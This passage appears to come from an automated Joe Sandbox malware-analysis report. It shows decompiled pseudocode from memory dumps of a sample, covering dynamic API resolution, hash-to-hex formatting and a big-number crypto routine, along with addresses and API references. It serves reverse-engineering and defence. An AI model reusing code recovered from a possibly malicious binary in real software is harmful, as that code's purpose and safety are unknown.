													if(_t102 >= 0) {
														_v24 = 1;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					_t68 = _v20;
					__eflags = _t68;
					if(_t68 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t68 + 8))))(_t68);
					}
					_t69 = _v8;
					__eflags = _t69;
					if(_t69 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t69 + 8))))(_t69);
					}
					_t70 = _v16;
					__eflags = _t70;
					if(_t70 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
					}
					_t71 = _v12;
					__eflags = _t71;
					if(_t71 != 0) {
						E003CBB40(_t71);
						_t156 = _t156 + 4;
					}
					__eflags = _t108;
					if(_t108 != 0) {
						E003CBB40(_t108);
					}
					return _v24;
				} else {
					return 0 | _t66 == 0x80070050;
				}
			}













































    0x003c1457
    0x003c1459
    0x003c145c
    0x003c145f
    0x003c1462
    0x003c1465
    0x003c1468
    0x003c146a
    0x003c146d
    0x003c1472
    0x003c1476
    0x003c1492
    0x003c1496
    0x003c14af
    0x003c14b4
    0x003c14b7
    0x003c14ba
    0x003c14c6
    0x003c14d2
    0x003c14d4
    0x003c14d7
    0x003c14d9
    0x003c14df
    0x003c14f0
    0x003c14f2
    0x003c1504
    0x003c1506
    0x003c1515
    0x003c151a
    0x003c1522
    0x003c152d
    0x003c152f
    0x003c1531
    0x003c1537
    0x003c1548
    0x003c154a
    0x003c154c
    0x003c1559
    0x003c1568
    0x003c1571
    0x003c1577
    0x003c157d
    0x003c1581
    0x003c1584
    0x003c158c
    0x003c1590
    0x003c1597
    0x003c159a
    0x003c15a4
    0x003c15a6
    0x003c15a8
    0x003c15cf
    0x003c15d1
    0x003c15d3
    0x003c15e4
    0x003c15e6
    0x003c15e8
    0x003c15ea
    0x003c15f5
    0x003c15f7
    0x003c15fc
    0x003c15fe
    0x003c1609
    0x003c160b
    0x003c1616
    0x003c1616
    0x003c1618
    0x003c161a
    0x003c161c
    0x003c161c
    0x003c161a
    0x003c15e8
    0x003c15d1
    0x003c15a8
    0x003c154c
    0x003c1531
    0x003c1506
    0x003c14d9
    0x003c161f
    0x003c1622
    0x003c1624
    0x003c162c
    0x003c162c
    0x003c162e
    0x003c1631
    0x003c1633
    0x003c163b
    0x003c163b
    0x003c163d
    0x003c1640
    0x003c1642
    0x003c164a
    0x003c164a
    0x003c164c
    0x003c164f
    0x003c1651
    0x003c1654
    0x003c1659
    0x003c1659
    0x003c165c
    0x003c165e
    0x003c1661
    0x003c1666
    0x003c1672
    0x003c1498
    0x003c14aa
    0x003c14aa

    APIs
    • memset.MSVCRT ref: 003C1559
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D0C80, Relevance: 1.4, Strings: 1, Instructions: 115
    C-Code - Quality: 95%
    			E003D0C80(void* __ecx) {
				char _v8;
				char _v12;
				signed int _v16;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t50;
				intOrPtr _t59;
				void* _t65;
				signed int _t66;
				signed int _t67;
				void* _t68;
				void* _t69;
				void* _t71;

				_t65 = __ecx;
				_t1 = _t65 + 0x28; // 0xf003e85
				_t29 =  *_t1;
				_t67 = 0;
				_v12 = 0;
				_v8 = 0x288;
				_v16 = 0;
				if( *_t1 != 0) {
					E003CBB40(_t29);
					_t68 = _t68 + 4;
					 *((intOrPtr*)(__ecx + 0x28)) = 0;
				}
				_t50 = E003D1D90(_v8, _t67);
				_t69 = _t68 + 8;
				if(_t50 == _t67) {
					L12:
					_t66 = _t67;
					goto L13;
				} else {
					_t59 =  *0x3e8628; // 0x622508
					_push( &_v8);
					_push(_t50);
					if( *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1f4))))() != 0x6f) {
						L6:
						_t14 = _t50 + 8; // 0x8
						if(E003CF720(_t14, 0x194,  &_v12,  &_v16, 0x800c) != 0) {
							_t41 = E003D1D90(2 + _v16 * 4, _t67);
							_t71 = _t69 + 8;
							 *((intOrPtr*)(_t65 + 0x28)) = _t41;
							if(_t41 == _t67) {
								goto L7;
							} else {
								do {
									_t22 = _t65 + 0x28; // 0xf003e85
									E003D0C10( *_t22 + _t67 * 4, 0x100, L"%02X",  *(_t67 + _v12) & 0x000000ff);
									_t67 = _t67 + 1;
									_t71 = _t71 + 0x10;
								} while (_t67 < 0x20);
								_t25 = _t65 + 0x28; // 0xf003e85
								 *((short*)( *_t25 + 0x80)) = 0;
								_t66 = 1;
								_t67 = 0;
								L13:
								_t32 = _v12;
								if(_v12 != _t67) {
									E003CBB40(_t32);
									_t69 = _t69 + 4;
								}
								if(_t50 != _t67) {
									E003CBB40(_t50);
								}
								return _t66;
							}
						} else {
							L7:
							return 0;
						}
					} else {
						_t50 = E003D1D90(_v8, _t50);
						_t69 = _t69 + 8;
						if(_t50 == _t67) {
							goto L12;
						} else {
							_t47 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0x1f4))))(_t50,  &_v8);
							goto L6;
						}
					}
				}
			}
















    0x003d0c89
    0x003d0c8b
    0x003d0c8b
    0x003d0c8e
    0x003d0c90
    0x003d0c93
    0x003d0c9a
    0x003d0c9f
    0x003d0ca2
    0x003d0ca7
    0x003d0caa
    0x003d0caa
    0x003d0cb7
    0x003d0cb9
    0x003d0cbe
    0x003d0d8a
    0x003d0d8a
    0x00000000
    0x003d0cc4
    0x003d0cc4
    0x003d0cd3
    0x003d0cd4
    0x003d0cda
    0x003d0d05
    0x003d0d17
    0x003d0d28
    0x003d0d3f
    0x003d0d44
    0x003d0d47
    0x003d0d4c
    0x00000000
    0x003d0d50
    0x003d0d50
    0x003d0d57
    0x003d0d69
    0x003d0d6e
    0x003d0d6f
    0x003d0d72
    0x003d0d77
    0x003d0d7c
    0x003d0d83
    0x003d0d86
    0x003d0d8c
    0x003d0d8c
    0x003d0d91
    0x003d0d94
    0x003d0d99
    0x003d0d99
    0x003d0d9e
    0x003d0da1
    0x003d0da6
    0x003d0db1
    0x003d0db1
    0x003d0d2c
    0x003d0d2c
    0x003d0d32
    0x003d0d32
    0x003d0cdc
    0x003d0ce6
    0x003d0ce8
    0x003d0ced
    0x00000000
    0x003d0cf3
    0x003d0cf3
    0x003d0d03
    0x00000000
    0x003d0d03
    0x003d0ced
    0x003d0cda

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CBA40, Relevance: 1.3, Strings: 1, Instructions: 72
    C-Code - Quality: 67%
    			E003CBA40(void* __ecx, intOrPtr _a4, char _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				void* _t15;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t42;

				_t24 = _a4;
				_t3 =  &_a8; // 0x3d094a
				_t37 =  *_t3;
				 *_a16 = 0;
				_t33 =  *0x3e8628; // 0x622508
				_v8 = 0;
				_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x1cc))))(_t24, _t37, 1, 0,  &_v8, 0, 0, _t36, _t23, __ecx);
				if(_t15 != 0) {
					_t42 = E003D1D90(_v8, 0);
					if(_t42 == 0) {
						L5:
						return 0;
					} else {
						_t18 =  *0x3e8628; // 0x622508
						_push(0);
						_push(0);
						_push( &_v8);
						_push(_t42);
						_push(7);
						_push(_t37);
						_push(_t24);
						if( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x1cc))))() != 0) {
							 *_a12 = _t42;
							 *_a16 = _v8;
							return 1;
						} else {
							E003CBB40(_t42);
							goto L5;
						}
					}
				} else {
					return _t15;
				}
			}












    0x003cba48
    0x003cba4c
    0x003cba4c
    0x003cba5b
    0x003cba61
    0x003cba68
    0x003cba76
    0x003cba7a
    0x003cba90
    0x003cba97
    0x003cbac0
    0x003cbac8
    0x003cba99
    0x003cba99
    0x003cbaa4
    0x003cbaa6
    0x003cbaab
    0x003cbaac
    0x003cbaad
    0x003cbaaf
    0x003cbab0
    0x003cbab5
    0x003cbad4
    0x003cbad8
    0x003cbae3
    0x003cbab7
    0x003cbab8
    0x00000000
    0x003cbabd
    0x003cbab5
    0x003cba7c
    0x003cba81
    0x003cba81

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DE04D, Relevance: .8, Instructions: 762Crypto
    C-Code - Quality: 100%
    			E003DE04D(void* __eax, signed int __ebx, signed int __edx, intOrPtr* __esi) {
				void* _t410;
				void* _t412;
				signed int _t413;
				signed int _t420;
				signed int _t424;
				signed int _t426;
				signed int _t427;
				void* _t428;
				signed int _t430;
				signed int _t431;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t440;
				signed int _t445;
				signed int _t455;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				void* _t460;
				void* _t465;
				signed int _t466;
				signed int _t467;
				intOrPtr _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t478;
				signed int* _t479;
				signed int _t481;
				unsigned int _t483;
				unsigned int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				intOrPtr _t489;
				signed int _t491;
				signed int _t492;
				signed int _t495;
				signed int _t497;
				signed int _t498;
				intOrPtr _t503;
				signed int _t504;
				signed int _t506;
				signed int _t507;
				signed int _t517;
				signed int* _t518;
				signed int _t520;
				unsigned int _t522;
				unsigned int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				intOrPtr _t528;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t537;
				intOrPtr _t542;
				signed int _t543;
				signed int _t545;
				signed int _t546;
				signed int _t558;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				void* _t564;
				void* _t568;
				signed int _t571;
				intOrPtr* _t573;
				signed int _t574;
				void* _t575;
				signed int _t579;
				signed int _t582;
				signed int _t585;
				signed int* _t586;
				signed int _t588;
				signed int _t589;
				unsigned int _t597;
				signed int _t598;
				intOrPtr _t599;
				signed int _t610;
				signed int _t618;
				signed int* _t619;
				signed int _t621;
				signed int _t622;
				unsigned int _t630;
				signed int _t631;
				intOrPtr _t632;
				signed int _t643;
				signed int _t667;
				signed int _t668;
				signed int _t669;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				void* _t691;
				signed int _t695;
				signed int _t697;
				signed int _t698;
				void* _t700;
				signed int _t701;
				signed int _t704;
				signed int _t707;
				intOrPtr _t708;
				intOrPtr _t709;
				signed int _t712;
				signed int _t714;
				signed int _t718;
				intOrPtr _t721;
				signed int _t724;
				signed int _t726;
				signed int _t730;
				intOrPtr* _t734;
				signed int _t736;
				signed int _t737;
				signed int _t741;
				signed int _t742;
				intOrPtr _t745;
				signed int _t747;
				signed int _t751;
				void* _t755;
				void* _t757;
				void* _t758;
				void* _t760;
				void* _t761;

				_t734 = __esi;
				_t758 = _t757 + 0xc;
				if(__eax == 0) {
					L102:
					E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
					return  *(_t755 - 0x38);
				}
				_t410 = E003DA920(__edx,  *(_t755 - 4),  *(_t755 - 4), 0x20);
				_t760 = _t758 + 0xc;
				if(_t410 == 0) {
					goto L102;
				}
				_t411 =  *(_t755 - 4);
				if( *((intOrPtr*)( *(_t755 - 4) + 4)) == __ebx) {
					__eflags = __ebx | 0xffffffff;
					_t412 = E003D6732(_t411, __ebx | 0xffffffff);
				} else {
					_t412 = E003DBF04(_t411);
				}
				if(_t412 == 0) {
					goto L102;
				} else {
					_t562 =  *(_t755 - 4);
					_t413 =  *(_t562 + 4);
					 *(_t755 - 0x14) =  *(_t755 - 0x14) & 0x00000000;
					if(_t413 <= 0) {
						L9:
						if(( *(_t562 + 0x10) & 0x00000004) != 0 || ( *(_t755 - 0x50) & 0x00000004) != 0) {
							 *(_t755 - 0x14) = 1;
						}
						if( *((intOrPtr*)(_t755 - 0x5c)) == 0) {
							goto L102;
						} else {
							if( *(_t755 - 0x14) != 0) {
								L16:
								_t690 =  *((intOrPtr*)(_t755 + 0x10));
								E003DA694( *((intOrPtr*)(_t755 + 0x10)));
								 *(_t755 - 0x20) = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
								_t558 = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
								_t420 = E003DA715(_t690);
								__eflags =  *(_t755 - 0x20);
								_t736 = _t420;
								 *(_t755 - 0x1c) = _t736;
								if( *(_t755 - 0x20) == 0) {
									L179:
									E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
									goto L102;
								}
								__eflags = _t558;
								if(_t558 == 0) {
									goto L179;
								}
								__eflags = _t736;
								if(_t736 == 0) {
									goto L179;
								}
								_t651 = _t755 - 0x60;
								_t424 = E003D6518(_t755 - 0x60) & 0x8000001f;
								__eflags = _t424;
								if(_t424 < 0) {
									_t424 = (_t424 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t424;
								}
								_t691 = 0x20;
								_t692 = _t691 - _t424;
								_t426 = E003DA920(_t651, _t736, _t755 - 0x60, _t691 - _t424);
								_t761 = _t760 + 0xc;
								__eflags = _t426;
								if(_t426 == 0) {
									goto L179;
								} else {
									 *(_t736 + 0xc) =  *(_t736 + 0xc) & 0x00000000;
									_t427 = E003DA920(_t651, _t558,  *(_t755 - 4), _t692 + 0x20);
									_t760 = _t761 + 0xc;
									__eflags = _t427;
									if(_t427 == 0) {
										goto L179;
									}
									 *(_t558 + 0xc) =  *(_t558 + 0xc) & 0x00000000;
									__eflags =  *(_t755 - 0x14);
									if( *(_t755 - 0x14) == 0) {
										L38:
										_t563 =  *(_t755 - 0x1c);
										_t737 =  *(_t563 + 4);
										_t428 =  *_t558;
										_t564 =  *_t563;
										 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
										_t695 =  *(_t558 + 4) - _t737;
										 *((intOrPtr*)(_t755 - 0x74)) = _t428 + _t695 * 4;
										 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t558 + 8)) - _t695;
										 *(_t755 - 0x64) =  *(_t558 + 0x10) | 0x00000002;
										 *(_t755 - 0x30) = _t737;
										 *(_t755 - 0x2c) = _t695;
										 *(_t755 - 0x70) = _t737;
										 *(_t755 - 0x18) =  *(_t564 + _t737 * 4 - 4);
										__eflags = _t737 - 1;
										if(_t737 != 1) {
											 *(_t755 - 0x28) =  *(_t564 + _t737 * 4 - 8);
										} else {
											 *(_t755 - 0x28) =  *(_t755 - 0x28) & 0x00000000;
										}
										 *(_t755 - 0x10) = _t428 +  *(_t558 + 4) * 4 - 4;
										_t430 =  *(_t755 - 4);
										 *(_t430 + 0xc) =  *(_t430 + 0xc) ^  *(_t755 - 0x54);
										_t568 = _t695 + 1;
										__eflags = _t568 -  *((intOrPtr*)(_t430 + 8));
										if(_t568 >  *((intOrPtr*)(_t430 + 8))) {
											_t430 = E003D665B(_t568, _t430);
											_t695 =  *(_t755 - 0x2c);
											_t737 =  *(_t755 - 0x30);
										}
										__eflags = _t430;
										if(_t430 == 0) {
											goto L179;
										} else {
											_t431 =  *(_t755 - 4);
											 *((intOrPtr*)(_t431 + 4)) = _t695 -  *(_t755 - 0x14);
											_t571 =  *(_t755 - 0x20);
											 *(_t755 - 0xc) =  *_t431 + _t695 * 4 - 4;
											_t434 = _t737 + 1;
											 *(_t755 - 0x34) = _t434;
											__eflags = _t434 -  *((intOrPtr*)(_t571 + 8));
											if(_t434 >  *((intOrPtr*)(_t571 + 8))) {
												_t435 = E003D665B( *(_t755 - 0x34), _t571);
												_t695 =  *(_t755 - 0x2c);
												_t737 =  *(_t755 - 0x30);
											} else {
												_t435 = _t571;
											}
											__eflags = _t435;
											if(_t435 == 0) {
												goto L179;
											} else {
												__eflags =  *(_t755 - 0x14);
												if( *(_t755 - 0x14) == 0) {
													_t536 = E003D687A(_t755 - 0x74,  *(_t755 - 0x1c));
													__eflags = _t536;
													if(_t536 < 0) {
														_t537 =  *(_t755 - 4);
														_t118 = _t537 + 4;
														 *_t118 =  *(_t537 + 4) - 1;
														__eflags =  *_t118;
													} else {
														E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t737);
														 *( *(_t755 - 0xc)) = 1;
													}
												}
												_t436 =  *(_t755 - 4);
												__eflags =  *(_t436 + 4);
												if( *(_t436 + 4) != 0) {
													_t124 = _t755 - 0xc;
													 *_t124 =  *(_t755 - 0xc) - 4;
													__eflags =  *_t124;
												} else {
													 *(_t436 + 0xc) =  *(_t436 + 0xc) & 0x00000000;
												}
												_t697 = _t695 - 1;
												__eflags = _t697;
												if(_t697 <= 0) {
													L76:
													_t437 =  *(_t558 + 4);
													_t658 = 0;
													__eflags = _t437;
													if(_t437 <= 0) {
														L80:
														__eflags =  *(_t755 - 0x14) - _t658;
														if( *(_t755 - 0x14) == _t658) {
															L85:
															E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
															_t734 =  *((intOrPtr*)(_t755 + 8));
															_t698 =  *(_t755 - 4);
															L86:
															if( *((intOrPtr*)(_t698 + 4)) <= 0) {
																_t440 = 0;
																__eflags = 0;
															} else {
																_t440 =  *((intOrPtr*)( *_t698));
															}
															 *(_t734 + 0x44) =  *(_t734 + 0x44) & 0x00000000;
															 *((intOrPtr*)(_t734 + 0x40)) = _t440;
															E003D6732( *((intOrPtr*)(_t755 - 8)), 0);
															_t740 =  *_t734 +  *_t734;
															if( *_t734 +  *_t734 < 0 || E003D68B4( *((intOrPtr*)(_t755 - 8)), _t740, _t658) == 0) {
																goto L102;
															} else {
																_t573 =  *((intOrPtr*)(_t755 - 8));
																_t445 =  *(_t573 + 4);
																 *(_t755 - 0x10) =  *(_t755 - 0x10) & 0;
																if(_t445 <= 0) {
																	L94:
																	if(( *(_t573 + 0x10) & 0x00000004) != 0 || ( *( *((intOrPtr*)(_t755 - 0x24)) + 0x10) & 0x00000004) != 0) {
																		 *(_t755 - 0x10) = 1;
																	}
																	_t446 =  *((intOrPtr*)(_t755 - 0x24));
																	if( *((intOrPtr*)( *((intOrPtr*)(_t755 - 0x24)) + 4)) == 0) {
																		goto L102;
																	} else {
																		if( *(_t755 - 0x10) != 0 || E003D687A( *((intOrPtr*)(_t755 - 8)), _t446) >= 0) {
																			_t699 =  *((intOrPtr*)(_t755 + 0x10));
																			E003DA694( *((intOrPtr*)(_t755 + 0x10)));
																			 *(_t755 - 0x18) = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
																			_t560 = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
																			_t741 = E003DA715(_t699);
																			 *(_t755 - 0x1c) = _t741;
																			_t455 = E003DA715(_t699);
																			__eflags =  *(_t755 - 0x18);
																			 *(_t755 - 4) = _t455;
																			if( *(_t755 - 0x18) == 0) {
																				goto L179;
																			}
																			__eflags = _t560;
																			if(_t560 == 0) {
																				goto L179;
																			}
																			__eflags = _t741;
																			if(_t741 == 0) {
																				goto L179;
																			}
																			__eflags = _t455;
																			if(_t455 == 0) {
																				goto L179;
																			}
																			_t659 =  *((intOrPtr*)(_t755 - 0x24));
																			_t457 = E003D6518( *((intOrPtr*)(_t755 - 0x24))) & 0x8000001f;
																			__eflags = _t457;
																			if(_t457 < 0) {
																				_t457 = (_t457 - 0x00000001 | 0xffffffe0) + 1;
																				__eflags = _t457;
																			}
																			_t700 = 0x20;
																			_t701 = _t700 - _t457;
																			_t458 = E003DA920(_t659, _t741, _t659, _t701);
																			__eflags = _t458;
																			if(_t458 == 0) {
																				goto L179;
																			} else {
																				 *(_t741 + 0xc) =  *(_t741 + 0xc) & 0x00000000;
																				 *((intOrPtr*)(_t755 - 0x48)) = _t701 + 0x20;
																				_t459 = E003DA920(_t659, _t560,  *((intOrPtr*)(_t755 - 8)), _t701 + 0x20);
																				__eflags = _t459;
																				if(_t459 == 0) {
																					goto L179;
																				}
																				 *(_t560 + 0xc) =  *(_t560 + 0xc) & 0x00000000;
																				__eflags =  *(_t755 - 0x10);
																				if( *(_t755 - 0x10) == 0) {
																					L128:
																					_t574 =  *(_t755 - 0x1c);
																					_t742 =  *(_t574 + 4);
																					_t460 =  *_t560;
																					_t575 =  *_t574;
																					 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
																					_t704 =  *(_t560 + 4) - _t742;
																					 *((intOrPtr*)(_t755 - 0x74)) = _t460 + _t704 * 4;
																					 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t560 + 8)) - _t704;
																					 *(_t755 - 0x64) =  *(_t560 + 0x10) | 0x00000002;
																					_t665 =  *(_t575 + _t742 * 4 - 4);
																					 *(_t755 - 0x30) = _t742;
																					 *(_t755 - 0x34) = _t704;
																					 *(_t755 - 0x70) = _t742;
																					 *(_t755 - 0x20) =  *(_t575 + _t742 * 4 - 4);
																					__eflags = _t742 - 1;
																					if(_t742 != 1) {
																						 *(_t755 - 0x2c) =  *(_t575 + _t742 * 4 - 8);
																					} else {
																						 *(_t755 - 0x2c) =  *(_t755 - 0x2c) & 0x00000000;
																					}
																					 *(_t755 - 0x14) = _t460 +  *(_t560 + 4) * 4 - 4;
																					_t579 =  *(_t755 - 4);
																					 *(_t579 + 0xc) =  *( *((intOrPtr*)(_t755 - 0x24)) + 0xc) ^  *( *((intOrPtr*)(_t755 - 8)) + 0xc);
																					_t465 = _t704 + 1;
																					__eflags = _t465 -  *((intOrPtr*)(_t579 + 8));
																					if(_t465 >  *((intOrPtr*)(_t579 + 8))) {
																						_t466 = E003D665B(_t465,  *(_t755 - 4));
																						_t704 =  *(_t755 - 0x34);
																						_t742 =  *(_t755 - 0x30);
																					} else {
																						_t466 = _t579;
																					}
																					__eflags = _t466;
																					if(_t466 == 0) {
																						goto L179;
																					} else {
																						_t467 =  *(_t755 - 4);
																						 *((intOrPtr*)(_t467 + 4)) = _t704 -  *(_t755 - 0x10);
																						_t582 =  *(_t755 - 0x18);
																						 *(_t755 - 0x28) =  *_t467 + _t704 * 4 - 4;
																						_t470 = _t742 + 1;
																						 *((intOrPtr*)(_t755 - 0x24)) = _t470;
																						__eflags = _t470 -  *((intOrPtr*)(_t582 + 8));
																						if(_t470 >  *((intOrPtr*)(_t582 + 8))) {
																							_t471 = E003D665B( *((intOrPtr*)(_t755 - 0x24)),  *(_t755 - 0x18));
																							_t704 =  *(_t755 - 0x34);
																							_t742 =  *(_t755 - 0x30);
																						} else {
																							_t471 = _t582;
																						}
																						__eflags = _t471;
																						if(_t471 == 0) {
																							goto L179;
																						} else {
																							__eflags =  *(_t755 - 0x10);
																							if( *(_t755 - 0x10) == 0) {
																								_t665 =  *(_t755 - 0x1c);
																								_t497 = E003D687A(_t755 - 0x74,  *(_t755 - 0x1c));
																								__eflags = _t497;
																								if(_t497 < 0) {
																									_t498 =  *(_t755 - 4);
																									_t325 = _t498 + 4;
																									 *_t325 =  *(_t498 + 4) - 1;
																									__eflags =  *_t325;
																								} else {
																									_t665 =  *( *(_t755 - 0x1c));
																									E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t742);
																									 *( *(_t755 - 0x28)) = 1;
																								}
																							}
																							_t472 =  *(_t755 - 4);
																							__eflags =  *(_t472 + 4);
																							if( *(_t472 + 4) != 0) {
																								_t331 = _t755 - 0x28;
																								 *_t331 =  *(_t755 - 0x28) - 4;
																								__eflags =  *_t331;
																							} else {
																								 *(_t472 + 0xc) =  *(_t472 + 0xc) & 0x00000000;
																							}
																							_t707 = _t704 - 1;
																							__eflags = _t707;
																							if(_t707 <= 0) {
																								L167:
																								_t473 =  *(_t560 + 4);
																								__eflags = _t473;
																								if(_t473 <= 0) {
																									L171:
																									_t745 =  *((intOrPtr*)(_t755 - 8));
																									_t708 =  *((intOrPtr*)(_t745 + 0xc));
																									E003DAA38( *((intOrPtr*)(_t755 - 0x48)), _t560, _t665, _t745);
																									__eflags =  *(_t745 + 4);
																									if( *(_t745 + 4) != 0) {
																										 *((intOrPtr*)(_t745 + 0xc)) = _t708;
																									}
																									__eflags =  *(_t755 - 0x10);
																									if( *(_t755 - 0x10) == 0) {
																										L178:
																										E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
																										goto L101;
																									}
																									_t478 =  *(_t755 - 4);
																									_t585 =  *(_t478 + 4);
																									__eflags = _t585;
																									if(_t585 <= 0) {
																										goto L178;
																									}
																									_t586 =  *_t478 + _t585 * 4 - 4;
																									while(1) {
																										_t747 =  *_t586;
																										_t586 = _t586 - 4;
																										__eflags = _t747;
																										if(_t747 != 0) {
																											goto L178;
																										}
																										 *(_t478 + 4) =  *(_t478 + 4) - 1;
																										__eflags =  *(_t478 + 4);
																										if( *(_t478 + 4) > 0) {
																											continue;
																										}
																										goto L178;
																									}
																									goto L178;
																								}
																								_t479 =  *_t560 + _t473 * 4 - 4;
																								while(1) {
																									_t588 =  *_t479;
																									_t479 = _t479 - 4;
																									__eflags = _t588;
																									if(_t588 != 0) {
																										goto L171;
																									}
																									 *(_t560 + 4) =  *(_t560 + 4) - 1;
																									__eflags =  *(_t560 + 4) - _t588;
																									if( *(_t560 + 4) > _t588) {
																										continue;
																									}
																									goto L171;
																								}
																								goto L171;
																							} else {
																								_t481 =  *(_t755 - 0x28) -  *(_t755 - 0x14);
																								__eflags = _t481;
																								 *(_t755 - 0x30) = _t707;
																								 *(_t755 - 0x3c) = _t481;
																								do {
																									_t589 =  *(_t755 - 0x14);
																									_t482 =  *_t589;
																									_t709 =  *((intOrPtr*)(_t589 - 4));
																									__eflags =  *_t589 -  *(_t755 - 0x20);
																									if( *_t589 !=  *(_t755 - 0x20)) {
																										_t483 = E003D6F02(_t482, _t709,  *(_t755 - 0x20));
																										 *((intOrPtr*)(_t755 - 0x40)) = _t709 - _t483 *  *(_t755 - 0x20);
																										 *(_t755 - 0xc) = _t483;
																										_t484 =  *(_t755 - 0x2c);
																										_t667 = _t484 & 0x0000ffff;
																										 *(_t755 - 0x34) = _t483 & 0x0000ffff;
																										_t712 = _t483 >> 0x10;
																										_t485 = _t484 >> 0x10;
																										_t668 = _t667 *  *(_t755 - 0x34);
																										 *(_t755 - 0x44) = _t712;
																										_t486 = _t485 *  *(_t755 - 0x44);
																										_t714 = _t485 *  *(_t755 - 0x34);
																										_t597 = _t667 * _t712 + _t714;
																										 *(_t755 - 0x34) = _t714;
																										__eflags = _t597 - _t714;
																										if(_t597 < _t714) {
																											_t486 = _t486 + 0x10000;
																											__eflags = _t486;
																										}
																										_t598 = _t597 << 0x10;
																										_t669 = _t668 + _t598;
																										_t487 = _t486 + (_t597 >> 0x10);
																										__eflags = _t669 - _t598;
																										if(_t669 < _t598) {
																											_t487 = _t487 + 1;
																											__eflags = _t487;
																										}
																										_t599 =  *((intOrPtr*)(_t755 - 0x40));
																										while(1) {
																											__eflags = _t487 - _t599;
																											if(__eflags < 0) {
																												break;
																											}
																											if(__eflags != 0) {
																												L157:
																												_t599 = _t599 +  *(_t755 - 0x20);
																												 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
																												__eflags = _t599 -  *(_t755 - 0x20);
																												if(_t599 <  *(_t755 - 0x20)) {
																													break;
																												}
																												__eflags = _t669 -  *(_t755 - 0x2c);
																												if(_t669 <  *(_t755 - 0x2c)) {
																													_t487 = _t487 - 1;
																													__eflags = _t487;
																												}
																												_t669 = _t669 -  *(_t755 - 0x2c);
																												__eflags = _t669;
																												continue;
																											}
																											_t718 =  *(_t755 - 0x14);
